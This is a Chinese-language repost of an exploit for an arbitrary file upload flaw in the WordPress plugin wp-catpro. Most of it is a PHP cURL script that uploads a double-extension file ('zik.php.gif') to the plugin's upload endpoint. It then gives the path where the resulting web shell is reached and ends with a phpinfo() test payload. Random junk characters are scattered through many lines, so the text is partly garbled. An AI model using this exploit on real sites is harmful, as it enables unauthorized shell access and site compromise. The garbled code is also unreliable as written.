WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
" O2 ^% M  _/ V/ r/ [下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

% D& N8 P2 ~0 j( G#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif
" N$ l! Z/ m" x2 O# k: P. N5 D# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

& J* B5 p! k7 {1 \#=> Exploit
-----------
5 q6 f3 J8 F) A( ?+ K  ]<?php
) N3 u, g& y6 W. r, U. h. j" R
$uploadfile="zik.php.gif";
" _+ U9 S; R/ O1 a$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
4 K# [5 n7 f5 ?% qcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
1 o9 S6 F! P) ~9 A7 rcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
' p6 l- Y  d% ]# M" z! e
print "$postResult";
" M1 n) e; I' e* x
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
5 O, m/ F9 _5 o; u# G7 k3 W  ?>
<?php
! \" T* @; n' v6 B& u5 d) Z. @phpinfo();
?>